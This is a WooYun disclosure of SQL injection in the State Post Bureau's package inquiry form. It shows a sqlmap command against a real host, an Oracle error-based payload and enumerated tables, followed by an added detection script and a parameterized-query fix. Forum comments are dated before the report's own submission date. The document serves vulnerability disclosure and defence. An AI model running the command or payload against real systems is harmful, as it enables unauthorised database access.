
Vulnerability summary

Defect ID: wooyun-2014-053063

Title: SQL injection in the State Post Bureau of the People's Republic of China

Affected vendor: State Post Bureau

Author: lxj616

Submitted: 2014-03-10 17:23

Fixed: 2014-04-24 17:24

Published: 2014-04-24 17:24

Vulnerability type: SQL injection

Severity: Medium

Self-assessed Rank: 12

Status: Handed over to a third-party partner organization (CNCERT, National Internet Emergency Center) for handling

Source: http://www.wooyun.org; for questions or help, contact [email protected]



Vulnerability details

Disclosure status:

2014-03-10: Details sent to the vendor; awaiting vendor response
2014-03-15: Vendor confirmed; details disclosed to the vendor only
2014-03-25: Details disclosed to core white hats and domain experts
2014-04-04: Details disclosed to regular white hats
2014-04-14: Details disclosed to intern white hats
2014-04-24: Details disclosed to the public

Brief description:

State Post Bureau of the People's Republic of China: SQL injection, verified with sqlmap

Detailed description:

http://www.spb.gov.cn/folder9/folder2047/index.html
Package inquiry function

[Screenshot: normal01.png]

[Screenshot: normal02.png]


Then tried enumerating the tables with sqlmap:

C:\Users\Administrator>sqlmap.py -u "219.141.228.193:8080/express/maincheck_pk.jsp" --data="radiobutton=2&addr1=a&addr2=d&kg=10&SS1=%B2%E9%D1%AF%D7%CA%B7%D1" --tables


sqlmap identified the following injection points with a total of 46 HTTP(s) requests:
---
Place: POST
Parameter: addr1
Type: error-based
Title: Oracle OR error-based - WHERE or HAVING clause (XMLType)
Payload: radiobutton=2&addr1=-8379') OR 8359=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(113)||CHR(105)||CHR(97)||CHR(113)||(SELECT (CASE WHEN (8359=8359) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(106)||CHR(116)||CHR(103)||CHR(113)||CHR(62))) FROM DUAL) AND ('TFti'='TFti&addr2=d&kg=10&SS1=%B2%E9%D1%AF%D7%CA%B7%D1
---
web application technology: JSP
back-end DBMS: Oracle
Database: EXFSYS
[1 table]
+--------------------------------+
| RLM$PARSEDCOND |
+--------------------------------+
Database: OLAPSYS
[9 tables]
+--------------------------------+
| CWM2$AWCUBECREATEACCESS |
| CWM2$AWDIMCREATEACCESS |
| CWM2$_AW_NEXT_TEMP_CUST_MEAS |
| CWM2$_AW_TEMP_CUST_MEAS_MAP |
| CWM2$_TEMP_VALUES |
| OLAP_SESSION_CUBES |
| OLAP_SESSION_DIMS |
| XML_LOAD_LOG |
| XML_LOAD_RECORDS |
+--------------------------------+
Database: EXPRESS
[38 tables]
+--------------------------------+
| F_AREAMEM_IN |
| F_AREAMEM_IN_HIS |
| F_AREAMEM_IN_TEM |
| F_AREAMEM_OUT |
| F_AREAMEM_OUT_HIS |
| F_AREAMEM_OUT_TEM |
| F_AREAMEM_OUT__ |
| F_AREA_IN |
| F_AREA_IN_HIS |
| F_AREA_IN_TEM |
| F_AREA_OUT |
| F_AREA_OUT_HIS |
| F_AREA_OUT_TEM |
| F_ARRAY |
| F_ARRAY_HIS |
| F_ARRAY_TEM |
| F_CPY |
| F_PROD |
| LOG_EXPRESS |
| LOG_EXPRESS_STAT |
| LOG_PACKAGE |
| LOG_PACKAGE_STAT |
| LOG_SYS_OPT |
| PBCATCOL |
| PBCATEDT |
| PBCATFMT |
| PBCATTBL |
| PBCATVLD |
| PC2DIST |
| PK_AREAMEM |
| PK_AREAS |
| PK_ARRAY |
| S_CITY |
| S_DIST |
| S_FIELDVALUE |
| S_PROV |
| S_QUERY_TYPE |
| TEST |
+--------------------------------+
Database: SYSTEM
[8 tables]
+--------------------------------+
| DEF$_TEMP$LOB |
| HELP |
| MVIEW$_ADV_INDEX |
| MVIEW$_ADV_OWB |
| MVIEW$_ADV_PARTITION |
| OL$ |
| OL$HINTS |
| OL$NODES |
+--------------------------------+
Database: SYS
[30 tables]
+--------------------------------+
| DUAL |
| AUDIT_ACTIONS |
| AW$AWCREATE |
| AW$AWCREATE10G |
| AW$AWMD |
| AW$AWREPORT |
| AW$AWXML |
| AW$EXPRESS |
| IMPDP_STATS |
| KU$NOEXP_TAB |
| ODCI_SECOBJ$ |
| ODCI_WARNINGS$ |
| OLAPI_HISTORY |
| OLAPI_IFACE_OBJECT_HISTORY |
| OLAPI_IFACE_OP_HISTORY |
| OLAPI_MEMORY_HEAP_HISTORY |
| OLAPI_MEMORY_OP_HISTORY |
| OLAPI_SESSION_HISTORY |
| OLAPTABLEVELS |
| OLAPTABLEVELTUPLES |
| OLAP_OLEDB_FUNCTIONS_PVT |
| OLAP_OLEDB_KEYWORDS |
| OLAP_OLEDB_MDPROPS |
| OLAP_OLEDB_MDPROPVALS |
| PLAN_TABLE$ |
| PSTUBTBL |
| STMT_AUDIT_OPTION_MAP |
| SYSTEM_PRIVILEGE_MAP |
| TABLE_PRIVILEGE_MAP |
| WRI$_ADV_ASA_RECO_DATA |
+--------------------------------+
Database: MDSYS
[36 tables]
+--------------------------------+
| OGIS_GEOMETRY_COLUMNS |
| OGIS_SPATIAL_REFERENCE_SYSTEMS |
| SDO_COORD_AXES |
| SDO_COORD_AXIS_NAMES |
| SDO_COORD_OPS |
| SDO_COORD_OP_METHODS |
| SDO_COORD_OP_PARAMS |
| SDO_COORD_OP_PARAM_USE |
| SDO_COORD_OP_PARAM_VALS |
| SDO_COORD_OP_PATHS |
| SDO_COORD_REF_SYS |
| SDO_COORD_SYS |
| SDO_CS_SRS |
| SDO_DATUMS |
| SDO_DATUMS_OLD_SNAPSHOT |
| SDO_ELLIPSOIDS |
| SDO_ELLIPSOIDS_OLD_SNAPSHOT |
| SDO_GEOR_PLUGIN_REGISTRY |
| SDO_GEOR_XMLSCHEMA_TABLE |
| SDO_GR_MOSAIC_0 |
| SDO_GR_MOSAIC_1 |
| SDO_GR_MOSAIC_2 |
| SDO_GR_MOSAIC_3 |
| SDO_GR_RDT_1 |
| SDO_PREFERRED_OPS_SYSTEM |
| SDO_PREFERRED_OPS_USER |
| SDO_PRIME_MERIDIANS |
| SDO_PROJECTIONS_OLD_SNAPSHOT |
| SDO_TOPO_DATA$ |
| SDO_TOPO_RELATION_DATA |
| SDO_TOPO_TRANSACT_DATA |
| SDO_TXN_IDX_DELETES |
| SDO_TXN_IDX_EXP_UPD_RGN |
| SDO_TXN_IDX_INSERTS |
| SDO_UNITS_OF_MEASURE |
| SDO_XML_SCHEMAS |
+--------------------------------+
Database: CTXSYS
[3 tables]
+--------------------------------+
| DR$NUMBER_SEQUENCE |
| DR$OBJECT_ATTRIBUTE |
| DR$POLICY_TAB |
+--------------------------------+
Database: WMSYS
[4 tables]
+--------------------------------+
| WM$NEXTVER_TABLE |
| WM$VERSION_HIERARCHY_TABLE |
| WM$VERSION_TABLE |
| WM$WORKSPACES_TABLE |
+--------------------------------+
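The sqlmap output above shows what the injected addr1 value looks like on the wire: a quote-and-parenthesis breakout, an XMLType() call, CHR() chains joined with ||, and a subquery against DUAL. The following Python is an added example, not part of the report, of how a defender could flag Oracle error-based probes of this shape in POST bodies. The log line format and timestamps are constructed; the request path and the injected body are taken from the sqlmap output in the report.

```python
import re
from urllib.parse import parse_qs

# The injected request body from the report, as sqlmap sent it (the other
# parameters are the form's normal fields; SS1 is the GBK-encoded button label).
REPORTED_PAYLOAD = (
    "radiobutton=2&addr1=-8379') OR 8359=(SELECT UPPER(XMLType(CHR(60)||CHR(58)"
    "||CHR(113)||CHR(113)||CHR(105)||CHR(97)||CHR(113)||(SELECT (CASE WHEN "
    "(8359=8359) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(106)||CHR(116)"
    "||CHR(103)||CHR(113)||CHR(62))) FROM DUAL) AND ('TFti'='TFti"
    "&addr2=d&kg=10&SS1=%B2%E9%D1%AF%D7%CA%B7%D1"
)

# Indicators of Oracle error-based injection of the kind sqlmap reported against
# this form. None of these fragments has a legitimate reason to appear in a
# place name or a weight field.
INDICATORS = {
    "xmltype_call": re.compile(r"\bXMLType\s*\(", re.I),
    "chr_concat_chain": re.compile(r"CHR\s*\(\s*\d+\s*\)\s*\|\|\s*CHR\s*\(", re.I),
    "select_from_dual": re.compile(r"\bSELECT\b.*\bFROM\s+DUAL\b", re.I | re.S),
    "quote_breakout": re.compile(r"""['"]\)?\s*(OR|AND)\s+[\w(]""", re.I),
}


def scan_post_body(body):
    """Return {parameter: [indicator names]} for each parameter whose URL-decoded
    value trips at least one indicator; {} for a clean body."""
    hits = {}
    # parse_qs URL-decodes each value once, which is what the JSP page would see.
    for name, values in parse_qs(body, keep_blank_values=True).items():
        for value in values:
            found = [key for key, rx in INDICATORS.items() if rx.search(value)]
            if found:
                hits.setdefault(name, []).extend(found)
    return hits


# Constructed sample log lines (not from the report): "<time> <method> <path> <body>".
# The first is a normal inquiry, the second replays the reported injection.
SAMPLE_LOG = [
    "2014-03-10T17:20:01 POST /express/maincheck_pk.jsp "
    "radiobutton=2&addr1=a&addr2=d&kg=10&SS1=%B2%E9%D1%AF%D7%CA%B7%D1",
    "2014-03-10T17:20:05 POST /express/maincheck_pk.jsp " + REPORTED_PAYLOAD,
]


def scan_log(lines):
    """Return (timestamp, path, hits) for every POST whose body trips an indicator."""
    alerts = []
    for line in lines:
        # The body may itself contain spaces, so split at most three times.
        parts = line.split(" ", 3)
        if len(parts) < 4 or parts[1] != "POST":
            continue
        timestamp, _, path, body = parts
        hits = scan_post_body(body)
        if hits:
            alerts.append((timestamp, path, hits))
    return alerts


if __name__ == "__main__":
    for timestamp, path, hits in scan_log(SAMPLE_LOG):
        print(timestamp, path, hits)
```

Matching runs on the decoded value rather than the raw body, so percent-encoded variants of the same probe are caught by the same rules; a real deployment would feed the alerts into the WAF or SIEM and tune the quote_breakout rule against legitimate place names containing apostrophes.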

Proof of vulnerability: the same sqlmap command and table listing as shown in the detailed description above.

Fix recommendation:

Shut the post office down; take unnecessary websites offline.
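Beyond taking the site offline, the code-level fix for a form like this one is to stop building SQL from the submitted fields. The example below is added here and is not the application's code: it uses sqlite3 as an offline stand-in for the Oracle backend, a constructed schema that borrows the table names S_CITY and F_AREA_OUT from the listing above, and places a concatenated query beside its parameterized form. In the JSP application the same change is a java.sql.PreparedStatement with setString/setInt in place of string concatenation.

```python
import sqlite3

# Constructed stand-in schema. The table names come from the report's listing;
# the columns and rows are invented for this example, and sqlite3 stands in
# for the Oracle backend so the example runs offline.
SCHEMA = """
CREATE TABLE s_city (code TEXT PRIMARY KEY, name TEXT NOT NULL);
CREATE TABLE f_area_out (city_code TEXT NOT NULL, kg INTEGER NOT NULL, fee REAL NOT NULL);
INSERT INTO s_city VALUES ('010', 'Beijing'), ('021', 'Shanghai');
INSERT INTO f_area_out VALUES ('010', 10, 12.0), ('021', 10, 15.0);
"""


def open_db():
    """Create an in-memory database loaded with the constructed sample data."""
    conn = sqlite3.connect(":memory:")
    conn.executescript(SCHEMA)
    return conn


def fee_lookup_vulnerable(conn, addr1, kg):
    """How the injectable query is typically written: kg is validated as an
    integer, but the destination name is spliced straight into the SQL text,
    so validating one parameter does nothing for the other."""
    sql = (
        "SELECT fee FROM f_area_out WHERE kg = " + str(int(kg)) +
        " AND city_code IN (SELECT code FROM s_city WHERE name = '" + addr1 + "')"
    )
    return [row[0] for row in conn.execute(sql)]


def fee_lookup_safe(conn, addr1, kg):
    """Same query with bind parameters: the statement text is fixed and addr1
    travels as data, so quotes or parentheses in it cannot alter the query."""
    sql = (
        "SELECT fee FROM f_area_out WHERE kg = ? "
        "AND city_code IN (SELECT code FROM s_city WHERE name = ?)"
    )
    return [row[0] for row in conn.execute(sql, (int(kg), addr1))]


if __name__ == "__main__":
    conn = open_db()
    # A normal inquiry behaves the same either way.
    print(fee_lookup_vulnerable(conn, "Beijing", 10), fee_lookup_safe(conn, "Beijing", 10))
    # A value that closes the quote and parenthesis, in the same shape as the
    # reported payload ("...') OR ... AND ('..."), turns the concatenated query
    # into a tautology that returns every row, but is just an unknown city
    # name to the parameterized one.
    probe = "x') OR ('1'='1"
    print(fee_lookup_vulnerable(conn, probe, 10), fee_lookup_safe(conn, probe, 10))
```

The contrast is the whole point: the parameterized query returns nothing for the probe because no city has that name, while the concatenated one returns fees for every city. Allow-listing the destination against S_CITY before querying is a reasonable second layer, but binding is the control that removes the injection class.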

Copyright notice: credit the source when reposting: lxj616@WooYun


Vulnerability response

Vendor response:

Severity: High

Vulnerability Rank: 13

Confirmed: 2014-03-15 20:38

Vendor reply:

CNVD has confirmed and reproduced the reported issue and has forwarded it through CNCERT to a national information security coordination body.

Latest status:

None yet


Vulnerability rating:

Comments

  1. 2014-03-07 21:57 | lck丶 ( Passerby | Rank:6 Vulns:2 | begging a guru to smash me with 0days )

    Front row

  2. 2014-03-07 21:59 | 坠落。 ( Passerby | Rank:17 Vulns:2 | -.- a nobody, a newbie, good at windows/linux... )

    mark

  3. 2014-03-07 21:59 | zph ( Regular white hat | Rank:235 Vulns:43 )

    Front row, leaving my name

  4. 2014-03-07 22:09 | U神 ( Core white hat | Rank:1285 Vulns:142 | Thanks to WooYun, I won't forget the kindness; actually I've always been quietly at WooYun... )

    mark! I'm wondering whether national-level sites can go through the major-vendor channel? If they can, I have one too

  5. 2014-03-07 22:12 | 几何黑店 ( Core white hat | Rank:1527 Vulns:231 | I need to keep a lower profile....... )

    Looks like a weekend blow-up!!!

  6. 2014-03-10 18:36 | 雷锋 ( Passerby | Rank:12 Vulns:2 | Taking jobs: drilling, scaffolding, carpentry, electrical, plumbing, labor... )

    Front row, selling AVIs

  7. 2014-03-10 22:54 | 马云 ( Passerby | Rank:10 Vulns:5 | pa pa pa pa pa pa pa pa )

    Front row, email me, looking for torrents